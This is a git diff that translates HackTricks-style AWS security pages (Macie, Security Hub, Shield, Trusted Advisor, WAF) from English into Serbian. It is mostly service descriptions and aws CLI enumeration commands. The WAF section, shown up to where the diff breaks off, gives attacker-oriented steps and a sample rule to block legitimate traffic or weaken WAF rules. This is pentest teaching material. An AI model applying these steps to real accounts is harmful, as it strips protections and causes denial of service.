+Funkcija istraživanja Amazon Macie omogućava prilagođene upite preko svih Macie podataka za dubinsku analizu. Filteri uključuju CloudTrail podatke, S3 Bucket svojstva i S3 objekte. Pored toga, podržava pozivanje drugih naloga da dele Amazon Macie, olakšavajući kolaborativno upravljanje podacima i praćenje bezbednosti.
 
 ### Enumeration
-
 ```
 # Get buckets
 aws macie2 describe-buckets
@@ -102,21 +101,16 @@ aws macie2 list-classification-jobs
 aws macie2 list-classification-scopes
 aws macie2 list-custom-data-identifiers
 ```
-
-#### Post Exploitation
+#### Post Exploatacija
 
 > [!TIP]
-> From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\
-> However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier.
+> Iz perspektive napadača, ova usluga nije napravljena da detektuje napadača, već da detektuje osetljive informacije u sačuvanim datotekama. Stoga, ova usluga može **pomoći napadaču da pronađe osetljive informacije** unutar kanti.\
+> Međutim, možda bi napadač takođe mogao biti zainteresovan da je ometa kako bi sprečio žrtvu da dobije upozorenja i lakše ukrade te informacije.
 
-TODO: PRs are welcome!
+TODO: PR-ovi su dobrodošli!
 
-## References
+## Reference
 
 - [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
index 36dc8fbe9..e2f9360dc 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
@@ -4,24 +4,23 @@
 
 ## Security Hub
 
-**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues.
+**Security Hub** prikuplja bezbednosne **podatke** iz **različitih AWS naloga**, usluga i podržanih proizvoda trećih strana i pomaže vam da **analizirate svoju bezbednost** i identifikujete najprioritetnije bezbednosne probleme.
 
-It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts
+Ona **centralizuje bezbednosne alarme između naloga**, i pruža UI za pregled ovih. Najveće ograničenje je to što **ne centralizuje alarme između regiona**, samo između naloga.
 
-**Characteristics**
+**Karakteristike**
 
-- Regional (findings don't cross regions)
-- Multi-account support
-- Findings from:
-  - Guard Duty
-  - Config
-  - Inspector
-  - Macie
-  - third party
-  - self-generated against CIS standards
+- Regionalno (nalazi se ne preklapaju između regiona)
+- Podrška za više naloga
+- Nalazi iz:
+- Guard Duty
+- Config
+- Inspector
+- Macie
+- treće strane
+- samoproizvedeni prema CIS standardima
 
 ## Enumeration
-
 ```
 # Get basic info
 aws securityhub describe-hub
@@ -50,7 +49,6 @@ aws securityhub list-automation-rules
 aws securityhub list-members
 aws securityhub get-members --account-ids 
 ```
-
 ## Bypass Detection
 
 TODO, PRs accepted
@@ -61,7 +59,3 @@ TODO, PRs accepted
 - [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
index b1df3003b..f0599f3c5 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
@@ -4,16 +4,12 @@
 
 ## Shield
 
-AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
+AWS Shield je dizajniran da pomogne **u zaštiti vaše infrastrukture od distribuiranih napada uskraćivanja usluge**, poznatih kao DDoS.
 
-**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53.
+**AWS Shield Standard** je **besplatan** za sve, i nudi **DDoS zaštitu** protiv nekih od uobičajenih napada na trećem sloju, **mrežnom sloju**, i četvrtom sloju, **transportnom sloju**. Ova zaštita je integrisana sa CloudFront i Route 53.
 
-**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**.
+**AWS Shield Advanced** nudi **veći nivo zaštite** za DDoS napade širom šireg spektra AWS usluga uz dodatni trošak. Ovaj napredni nivo nudi zaštitu za vaše web aplikacije koje rade na EC2, CloudFront, ELB, kao i Route 53. Pored ovih dodatnih tipova resursa koji su zaštićeni, postoje poboljšani nivoi DDoS zaštite u poređenju sa Standard verzijom. Takođe ćete imati **pristup specijalizovanom DDoS timu za odgovor 24/7 u AWS-u, poznatom kao DRT**.
 
-Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.**
+Dok je Standard verzija Shield-a nudila zaštitu protiv trećeg i četvrtog sloja, **Advanced takođe nudi zaštitu protiv sedmog sloja, aplikacionih, napada.**
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
index a975d7476..4c6c3f093 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
@@ -6,70 +6,66 @@
 
 ## AWS Trusted Advisor Overview
 
-Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories:
+Trusted Advisor je usluga koja **pruža preporuke** za optimizaciju vašeg AWS naloga, usklađujući se sa **AWS najboljim praksama**. To je usluga koja funkcioniše u više regiona. Trusted Advisor nudi uvide u četiri glavne kategorije:
 
-1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses.
-2. **Performance:** Identifies potential performance bottlenecks.
-3. **Security:** Scans for vulnerabilities or weak security configurations.
-4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance.
+1. **Optimizacija troškova:** Predlaže kako da restrukturirate resurse kako biste smanjili troškove.
+2. **Performanse:** Identifikuje potencijalne uska grla u performansama.
+3. **Bezbednost:** Skener za ranjivosti ili slabe bezbednosne konfiguracije.
+4. **Otpornost na greške:** Preporučuje prakse za poboljšanje otpornosti usluga i otpornosti na greške.
 
-The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security.
+Sveobuhvatne funkcije Trusted Advisor-a su isključivo dostupne uz **AWS poslovne ili preduzetničke planove podrške**. Bez ovih planova, pristup je ograničen na **šest osnovnih provera**, prvenstveno fokusiranih na performanse i bezbednost.
 
 ### Notifications and Data Refresh
 
-- Trusted Advisor can issue alerts.
-- Items can be excluded from its checks.
-- Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh.
+- Trusted Advisor može izdavati upozorenja.
+- Stavke se mogu isključiti iz njegovih provera.
+- Podaci se osvežavaju svake 24 sata. Međutim, ručno osvežavanje je moguće 5 minuta nakon poslednjeg osvežavanja.
 
 ### **Checks Breakdown**
 
 #### CategoriesCore
 
-1. Cost Optimization
-2. Security
-3. Fault Tolerance
-4. Performance
-5. Service Limits
-6. S3 Bucket Permissions
+1. Optimizacija troškova
+2. Bezbednost
+3. Otpornost na greške
+4. Performanse
+5. Ograničenja usluga
+6. S3 dozvole za kante
 
 #### Core Checks
 
-Limited to users without business or enterprise support plans:
+Ograničeno na korisnike bez poslovnih ili preduzetničkih planova podrške:
 
-1. Security Groups - Specific Ports Unrestricted
-2. IAM Use
-3. MFA on Root Account
-4. EBS Public Snapshots
-5. RDS Public Snapshots
-6. Service Limits
+1. Bezbednosne grupe - Specifične portove bez ograničenja
+2. Korišćenje IAM-a
+3. MFA na root nalogu
+4. EBS javni snimci
+5. RDS javni snimci
+6. Ograničenja usluga
 
 #### Security Checks
 
-A list of checks primarily focusing on identifying and rectifying security threats:
+Lista provera koja se prvenstveno fokusira na identifikaciju i ispravljanje bezbednosnih pretnji:
 
-- Security group settings for high-risk ports
-- Security group unrestricted access
-- Open write/list access to S3 buckets
-- MFA enabled on root account
-- RDS security group permissiveness
-- CloudTrail usage
-- SPF records for Route 53 MX records
-- HTTPS configuration on ELBs
-- Security groups for ELBs
-- Certificate checks for CloudFront
-- IAM access key rotation (90 days)
-- Exposure of access keys (e.g., on GitHub)
-- Public visibility of EBS or RDS snapshots
-- Weak or absent IAM password policies
+- Podešavanja bezbednosnih grupa za visoko rizične portove
+- Neograničen pristup bezbednosnim grupama
+- Otvoren pristup za pisanje/listanje na S3 kante
+- MFA omogućeno na root nalogu
+- Popustljivost bezbednosne grupe RDS-a
+- Korišćenje CloudTrail-a
+- SPF zapisi za Route 53 MX zapise
+- HTTPS konfiguracija na ELB-ima
+- Bezbednosne grupe za ELB-e
+- Provere sertifikata za CloudFront
+- Rotacija IAM pristupnih ključeva (90 dana)
+- Izloženost pristupnim ključevima (npr. na GitHub-u)
+- Javni pristup EBS ili RDS snimcima
+- Slabe ili odsutne politike lozinki za IAM
 
-AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices.
+AWS Trusted Advisor deluje kao ključni alat u osiguravanju optimizacije, performansi, bezbednosti i otpornosti na greške AWS usluga na osnovu utvrđenih najboljih praksi.
 
 ## **References**
 
 - [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
index 661b836d5..fcb7f2073 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md
@@ -6,103 +6,102 @@
 
 ## AWS WAF
 
-AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules.
+AWS WAF je **vatrozid za web aplikacije** dizajniran da **zaštiti web aplikacije ili API-je** od raznih web eksploatacija koje mogu uticati na njihovu dostupnost, sigurnost ili potrošnju resursa. Omogućava korisnicima da kontrolišu dolazni saobraćaj postavljanjem **pravila sigurnosti** koja ublažavaju tipične vektore napada kao što su SQL injekcija ili cross-site scripting, kao i definisanjem prilagođenih pravila filtriranja.
 
-### Key concepts
+### Ključni koncepti
 
-#### Web ACL (Access Control List)
+#### Web ACL (Lista kontrole pristupa)
 
-A Web ACL is a collection of rules that you can apply to your web applications or APIs. When you associate a Web ACL with a resource, AWS WAF inspects incoming requests based on the rules defined in the Web ACL and takes the specified actions.
+Web ACL je zbirka pravila koja možete primeniti na svoje web aplikacije ili API-je. Kada povežete Web ACL sa resursom, AWS WAF inspekcioniše dolazne zahteve na osnovu pravila definisanih u Web ACL-u i preduzima određene akcije.
 
-#### Rule Group
+#### Grupa pravila
 
-A Rule Group is a reusable collection of rules that you can apply to multiple Web ACLs. Rule groups help manage and maintain consistent rule sets across different web applications or APIs.
+Grupa pravila je ponovo upotrebljiva zbirka pravila koja možete primeniti na više Web ACL-a. Grupe pravila pomažu u upravljanju i održavanju doslednih skupova pravila širom različitih web aplikacija ili API-ja.
 
-Each rule group has its associated **capacity**, which helps to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. Once its value is set during creation, it is not possible to modify it.
+Svaka grupa pravila ima svoju povezanu **kapacitet**, koja pomaže u izračunavanju i kontroli operativnih resursa koji se koriste za pokretanje vaših pravila, grupa pravila i web ACL-a. Kada se njena vrednost postavi tokom kreiranja, nije moguće izmeniti je.
 
-#### Rule
+#### Pravilo
 
-A rule defines a set of conditions that AWS WAF uses to inspect incoming web requests. There are two main types of rules:
+Pravilo definiše skup uslova koje AWS WAF koristi za inspekciju dolaznih web zahteva. Postoje dve glavne vrste pravila:
 
-1. **Regular Rule**: This rule type uses specified conditions to determine whether to allow, block, or count web requests.
-2. **Rate-Based Rule**: Counts requests from a specific IP address over a five-minute period. Here, users define a threshold, and if the number of requests from an IP exceeds this limit within five minutes, subsequent requests from that IP are blocked until the request rate drops below the threshold. The minimum threshold for rate-based rules is **2000 requests**.
+1. **Redovno pravilo**: Ova vrsta pravila koristi određene uslove da odredi da li da dozvoli, blokira ili broji web zahteve.
+2. **Pravilo zasnovano na brzini**: Broji zahteve sa određene IP adrese tokom petominutnog perioda. Ovde korisnici definišu prag, i ako broj zahteva sa IP adrese premaši ovaj limit unutar pet minuta, naredni zahtevi sa te IP adrese se blokiraju dok stopa zahteva ne padne ispod praga. Minimalni prag za pravila zasnovana na brzini je **2000 zahteva**.
 
-#### Managed Rules
+#### Upravljana pravila
 
-AWS WAF offers pre-configured, managed rule sets that are maintained by AWS and AWS Marketplace sellers. These rule sets provide protection against common threats and are regularly updated to address new vulnerabilities.
+AWS WAF nudi unapred konfigurisane, upravljane skupove pravila koje održava AWS i prodavci na AWS Marketplace-u. Ovi skupovi pravila pružaju zaštitu od uobičajenih pretnji i redovno se ažuriraju kako bi se rešile nove ranjivosti.
 
-#### IP Set
+#### IP skup
 
-An IP Set is a list of IP addresses or IP address ranges that you want to allow or block. IP sets simplify the process of managing IP-based rules.
+IP skup je lista IP adresa ili opsega IP adresa koje želite da dozvolite ili blokirate. IP skupovi pojednostavljuju proces upravljanja pravilima zasnovanim na IP adresama.
 
-#### Regex Pattern Set
+#### Regex obrazac skup
 
-A Regex Pattern Set contains one or more regular expressions (regex) that define patterns to search for in web requests. This is useful for more complex matching scenarios, such as filtering specific sequences of characters.
+Regex obrazac skup sadrži jedan ili više regularnih izraza (regex) koji definišu obrasce za pretragu u web zahtevima. Ovo je korisno za složenije scenarije usklađivanja, kao što je filtriranje specifičnih sekvenci karaktera.
 
 #### Lock Token
 
-A Lock Token is used for concurrency control when making updates to WAF resources. It ensures that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously.
+Lock Token se koristi za kontrolu konkurencije prilikom ažuriranja WAF resursa. Osigurava da promene ne budu slučajno prepisane od strane više korisnika ili procesa koji pokušavaju da ažuriraju isti resurs istovremeno.
 
-#### API Keys
+#### API ključevi
 
-API Keys in AWS WAF are used to authenticate requests to certain API operations. These keys are encrypted and managed securely to control access and ensure that only authorized users can make changes to WAF configurations.
+API ključevi u AWS WAF se koriste za autentifikaciju zahteva za određene API operacije. Ovi ključevi su šifrovani i bezbedno upravljani kako bi se kontrolisao pristup i osiguralo da samo ovlašćeni korisnici mogu da vrše promene u WAF konfiguracijama.
 
-- **Example**: Integration of the CAPTCHA API.
+- **Primer**: Integracija CAPTCHA API-ja.
 
-#### Permission Policy
+#### Politika dozvola
 
-A Permission Policy is an IAM policy that specifies who can perform actions on AWS WAF resources. By defining permissions, you can control access to WAF resources and ensure that only authorized users can create, update, or delete configurations.
+Politika dozvola je IAM politika koja specificira ko može da izvršava radnje na AWS WAF resursima. Definisanjem dozvola možete kontrolisati pristup WAF resursima i osigurati da samo ovlašćeni korisnici mogu da kreiraju, ažuriraju ili brišu konfiguracije.
 
-#### Scope
+#### Opseg
 
-The scope parameter in AWS WAF specifies whether the WAF rules and configurations apply to a regional application or an Amazon CloudFront distribution.
+Parametar opsega u AWS WAF specificira da li se WAF pravila i konfiguracije primenjuju na regionalnu aplikaciju ili Amazon CloudFront distribuciju.
 
-- **REGIONAL**: Applies to regional services such as Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito user pool, AWS App Runner service and AWS Verified Access instance. You specify the AWS region where these resources are located.
-- **CLOUDFRONT**: Applies to Amazon CloudFront distributions, which are global. WAF configurations for CloudFront are managed through the `us-east-1` region regardless of where the content is served.
+- **REGIONAL**: Primena na regionalne usluge kao što su Application Load Balancers (ALB), Amazon API Gateway REST API, AWS AppSync GraphQL API, Amazon Cognito korisnički bazen, AWS App Runner usluga i AWS Verified Access instanca. Specifikujete AWS region u kojem se ovi resursi nalaze.
+- **CLOUDFRONT**: Primena na Amazon CloudFront distribucije, koje su globalne. WAF konfiguracije za CloudFront se upravljaju kroz region `us-east-1` bez obzira na to gde se sadržaj isporučuje.
 
-### Key features
+### Ključne karakteristike
 
-#### Monitoring Criteria (Conditions)
+#### Kriterijumi praćenja (Uslovi)
 
-**Conditions** specify the elements of incoming HTTP/HTTPS requests that AWS WAF monitors, which include XSS, geographical location (GEO), IP addresses, Size constraints, SQL Injection, and patterns (strings and regex matching). It's important to note that **requests restricted at the CloudFront level based on country won't reach WAF**.
+**Uslovi** specificiraju elemente dolaznih HTTP/HTTPS zahteva koje AWS WAF prati, uključujući XSS, geografsku lokaciju (GEO), IP adrese, ograničenja veličine, SQL injekciju i obrasce (stringove i regex usklađivanje). Važno je napomenuti da **zahtevi ograničeni na CloudFront nivou na osnovu zemlje neće dostići WAF**.
 
-Each AWS account can configure:
+Svaki AWS nalog može konfigurisati:
 
-- **100 conditions** for each type (except for Regex, where only **10 conditions** are allowed, but this limit can be increased).
-- **100 rules** and **50 Web ACLs**.
-- A maximum of **5 rate-based rules**.
-- A throughput of **10,000 requests per second** when WAF is implemented with an application load balancer.
+- **100 uslova** za svaku vrstu (osim za Regex, gde je dozvoljeno samo **10 uslova**, ali ovaj limit može biti povećan).
+- **100 pravila** i **50 Web ACL-a**.
+- Maksimalno **5 pravila zasnovanih na brzini**.
+- Propusnost od **10,000 zahteva po sekundi** kada je WAF implementiran sa aplikacionim load balancerom.
 
-#### Rule actions
+#### Akcije pravila
 
-Actions are assigned to each rule, with options being:
+Akcije su dodeljene svakom pravilu, a opcije su:
 
-- **Allow**: The request is forwarded to the appropriate CloudFront distribution or Application Load Balancer.
-- **Block**: The request is terminated immediately.
-- **Count**: Tallies the requests meeting the rule's conditions. This is useful for rule testing, confirming the rule's accuracy before setting it to Allow or Block.
-- **CAPTCHA and Challenge:** It is verified that the request does not come from a bot using CAPTCHA puzzles and silent challenges.
+- **Dozvoli**: Zahtev se prosleđuje odgovarajućoj CloudFront distribuciji ili Application Load Balancer-u.
+- **Blokiraj**: Zahtev se odmah prekida.
+- **Broj**: Broji zahteve koji ispunjavaju uslove pravila. Ovo je korisno za testiranje pravila, potvrđivanje tačnosti pravila pre nego što se postavi na Dozvoli ili Blokiraj.
+- **CAPTCHA i Izazov:** Proverava se da zahtev ne dolazi od bota koristeći CAPTCHA zagonetke i tihe izazove.
 
-If a request doesn't match any rule within the Web ACL, it undergoes the **default action** (Allow or Block). The order of rule execution, defined within a Web ACL, is crucial and typically follows this sequence:
+Ako zahtev ne odgovara nijednom pravilu unutar Web ACL-a, podvrgava se **podrazumevanoj akciji** (Dozvoli ili Blokiraj). Redosled izvršenja pravila, definisan unutar Web ACL-a, je ključan i obično prati ovu sekvencu:
 
-1. Allow Whitelisted IPs.
-2. Block Blacklisted IPs.
-3. Block requests matching any detrimental signatures.
+1. Dozvoli IP adrese sa bele liste.
+2. Blokiraj IP adrese sa crne liste.
+3. Blokiraj zahteve koji odgovaraju bilo kojim štetnim potpisima.
 
-#### CloudWatch Integration
+#### CloudWatch integracija
 
-AWS WAF integrates with CloudWatch for monitoring, offering metrics like AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. These metrics are reported every minute by default and retained for a period of two weeks.
+AWS WAF se integriše sa CloudWatch za praćenje, nudeći metrike kao što su AllowedRequests, BlockedRequests, CountedRequests i PassedRequests. Ove metrike se izveštavaju svake minute po defaultu i čuvaju se tokom perioda od dve nedelje.
 
-### Enumeration
+### Enumeracija
 
-In order to interact with CloudFront distributions, you must specify the Region US East (N. Virginia):
+Da biste interagovali sa CloudFront distribucijama, morate specificirati region US East (N. Virginia):
 
-- CLI - Specify the Region US East when you use the CloudFront scope: `--scope CLOUDFRONT --region=us-east-1` .
-- API and SDKs - For all calls, use the Region endpoint us-east-1.
+- CLI - Specifikujte region US East kada koristite CloudFront opseg: `--scope CLOUDFRONT --region=us-east-1`.
+- API i SDK-ovi - Za sve pozive, koristite region endpoint us-east-1.
 
-In order to interact with regional services, you should specify the region:
-
-- Example with the region Europe (Spain): `--scope REGIONAL --region=eu-south-2`
+Da biste interagovali sa regionalnim uslugama, trebate specificirati region:
 
+- Primer sa regionom Evropa (Španija): `--scope REGIONAL --region=eu-south-2`
 ```bash
 # Web ACLs #
 
@@ -146,7 +145,7 @@ aws wafv2 list-ip-sets --scope  | CLOUDFRONT --region=
 aws wafv2 get-ip-set --name  --id  --scope  | CLOUDFRONT --region=us-east-1>
 ## Retrieve the keys that are currently being managed by a rate-based rule.
 aws wafv2 get-rate-based-statement-managed-keys --scope  | CLOUDFRONT --region=us-east-1>\
- --web-acl-name  --web-acl-id  --rule-name  [--rule-group-rule-name ]
+--web-acl-name  --web-acl-id  --rule-name  [--rule-group-rule-name ]
 
 # Regex pattern sets #
 
@@ -186,78 +185,70 @@ aws wafv2 list-mobile-sdk-releases --platform 
 aws wafv2 get-mobile-sdk-release --platform  --release-version 
 
 ```
-
-### Post Exploitation / Bypass
+### Post Exploatacija / Obilaženje
 
 > [!TIP]
-> From an attackers perspective, this service can help the attacker to identify WAF protections and network exposures that could help him to compromise other webs.
+> Sa stanovišta napadača, ova usluga može pomoći napadaču da identifikuje WAF zaštite i mrežne izloženosti koje bi mu mogle pomoći da kompromituje druge veb stranice.
 >
-> However, an attacker could also be interested in disrupting this service so the webs aren't protected by the WAF.
+> Međutim, napadač bi takođe mogao biti zainteresovan za ometanje ove usluge kako veb stranice ne bi bile zaštićene WAF-om.
 
-In many of the Delete and Update operations it would be necessary to provide the **lock token**. This token is used for concurrency control over the resources, ensuring that changes are not accidentally overwritten by multiple users or processes attempting to update the same resource simultaneously. In order to obtain this token you could perform the correspondent **list** or **get** operations over the specific resource.
+U mnogim operacijama brisanja i ažuriranja biće neophodno obezbediti **lock token**. Ovaj token se koristi za kontrolu konkurencije nad resursima, osiguravajući da promene ne budu slučajno prepisane od strane više korisnika ili procesa koji pokušavaju da ažuriraju isti resurs istovremeno. Da biste dobili ovaj token, mogli biste izvršiti odgovarajuće **list** ili **get** operacije nad specifičnim resursom.
 
 #### **`wafv2:CreateRuleGroup`, `wafv2:UpdateRuleGroup`, `wafv2:DeleteRuleGroup`**
 
-An attacker would be able to compromise the security of the affected resource by:
-
-- Creating rule groups that could, for instance, block legitimate traffic from legitimate IP addresses, causing a denial of service.
-- Updating rule groups, being able to modify its actions for example from **Block** to **Allow**.
-- Deleting rule groups that provide critical security measures.
+Napadač bi mogao da kompromituje bezbednost pogođenog resursa na sledeće načine:
 
+- Kreiranjem grupa pravila koje bi, na primer, mogle blokirati legitimni saobraćaj sa legitimnih IP adresa, uzrokujući uskraćivanje usluge.
+- Ažuriranjem grupa pravila, sa mogućnošću da modifikuje njihove akcije, na primer, sa **Block** na **Allow**.
+- Brisanjem grupa pravila koje pružaju kritične mere bezbednosti.
 ```bash
 # Create Rule Group
 aws wafv2 create-rule-group --name  --capacity  --visibility-config  \
 --scope  | CLOUDFRONT --region=us-east-1> [--rules ] [--description ]
 # Update Rule Group
 aws wafv2 update-rule-group --name  --id  --visibility-config  --lock-token \
- --scope  | CLOUDFRONT --region=us-east-1> [--rules ] [--description ]
+--scope  | CLOUDFRONT --region=us-east-1> [--rules ] [--description ]
 # Delete Rule Group
 aws wafv2 delete-rule-group --name  --id  --lock-token  --scope  | CLOUDFRONT --region=us-east-1>
 ```
-
-The following examples shows a rule group that would block legitimate traffic from specific IP addresses:
-
+Следећи примери показују групу правила која би блокирала легитиман саобраћај са специфичних IP адреса:
 ```bash
 aws wafv2 create-rule-group --name BlockLegitimateIPsRuleGroup --capacity 1 --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=BlockLegitimateIPsRuleGroup --scope CLOUDFRONT --region us-east-1 --rules file://rule.json
 ```
-
-The **rule.json** file would look like:
-
+Datoteka **rule.json** bi izgledala ovako:
 ```json
 [
-  {
-    "Name": "BlockLegitimateIPsRule",
-    "Priority": 0,
-    "Statement": {
-      "IPSetReferenceStatement": {
-        "ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
-      }
-    },
-    "Action": {
-      "Block": {}
-    },
-    "VisibilityConfig": {
-      "SampledRequestsEnabled": false,
-      "CloudWatchMetricsEnabled": false,
-      "MetricName": "BlockLegitimateIPsRule"
-    }
-  }
+{
+"Name": "BlockLegitimateIPsRule",
+"Priority": 0,
+"Statement": {
+"IPSetReferenceStatement": {
+"ARN": "arn:aws:wafv2:us-east-1:123456789012:global/ipset/legitIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+}
+},
+"Action": {
+"Block": {}
+},
+"VisibilityConfig": {
+"SampledRequestsEnabled": false,
+"CloudWatchMetricsEnabled": false,
+"MetricName": "BlockLegitimateIPsRule"
+}
+}
 ]
 ```
-
-**Potential Impact**: Unauthorized access, data breaches, and potential DoS attacks.
+**Potencijalni Uticaj**: Neovlašćen pristup, curenje podataka i potencijalni DoS napadi.
 
 #### **`wafv2:CreateWebACL`, `wafv2:UpdateWebACL`, `wafv2:DeleteWebACL`**
 
-With these permissions, an attacker would be able to:
+Sa ovim dozvolama, napadač bi mogao da:
 
-- Create a new Web ACL, introducing rules that either allow malicious traffic through or block legitimate traffic, effectively rendering the WAF useless or causing a denial of service.
-- Update existing Web ACLs, being able to modify rules to permit attacks such as SQL injection or cross-site scripting, which were previously blocked, or disrupt normal traffic flow by blocking valid requests.
-- Delete a Web ACL, leaving the affected resources entirely unprotected, exposing it to a broad range of web attacks.
+- Kreira novi Web ACL, uvodeći pravila koja ili dozvoljavaju zlonamerni saobraćaj ili blokiraju legitimni saobraćaj, čime efikasno čini WAF beskorisnim ili uzrokuje uskraćivanje usluge.
+- Ažurira postojeće Web ACL-ove, imajući mogućnost da modifikuje pravila kako bi dozvolio napade kao što su SQL injekcija ili cross-site scripting, koji su prethodno bili blokirani, ili ometa normalan protok saobraćaja blokirajući validne zahteve.
+- Obriše Web ACL, ostavljajući pogođene resurse potpuno nezaštićenim, izlažući ih širokom spektru web napada.
 
 > [!NOTE]
-> You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false.
-
+> Možete obrisati navedeni **WebACL** samo ako je **ManagedByFirewallManager** false.
 ```bash
 # Create Web ACL
 aws wafv2 create-web-acl --name  --default-action  --visibility-config  \
@@ -268,119 +259,109 @@ aws wafv2 update-web-acl --name  --id  --default-action  --
 # Delete Web ACL
 aws wafv2 delete-web-acl --name  --id  --lock-token  --scope  | CLOUDFRONT --region=us-east-1>
 ```
-
-The following examples shows how to update a Web ACL to block the legitimate traffic from a specific IP set. If the origin IP does not match any of those IPs, the default action would also be blocking it, causing a DoS.
+Sledeći primeri pokazuju kako ažurirati Web ACL da blokira legitimni saobraćaj iz određenog IP skupa. Ako izvorni IP ne odgovara nijednom od tih IP adresa, podrazumevana akcija bi takođe bila blokiranje, što uzrokuje DoS.
 
 **Original Web ACL**:
-
 ```json
 {
-  "WebACL": {
-    "Name": "AllowLegitimateIPsWebACL",
-    "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
-    "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
-    "DefaultAction": {
-      "Allow": {}
-    },
-    "Description": "",
-    "Rules": [
-      {
-        "Name": "AllowLegitimateIPsRule",
-        "Priority": 0,
-        "Statement": {
-          "IPSetReferenceStatement": {
-            "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
-          }
-        },
-        "Action": {
-          "Allow": {}
-        },
-        "VisibilityConfig": {
-          "SampledRequestsEnabled": false,
-          "CloudWatchMetricsEnabled": false,
-          "MetricName": "AllowLegitimateIPsRule"
-        }
-      }
-    ],
-    "VisibilityConfig": {
-      "SampledRequestsEnabled": false,
-      "CloudWatchMetricsEnabled": false,
-      "MetricName": "AllowLegitimateIPsWebACL"
-    },
-    "Capacity": 1,
-    "ManagedByFirewallManager": false,
-    "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:"
-  },
-  "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
+"WebACL": {
+"Name": "AllowLegitimateIPsWebACL",
+"Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
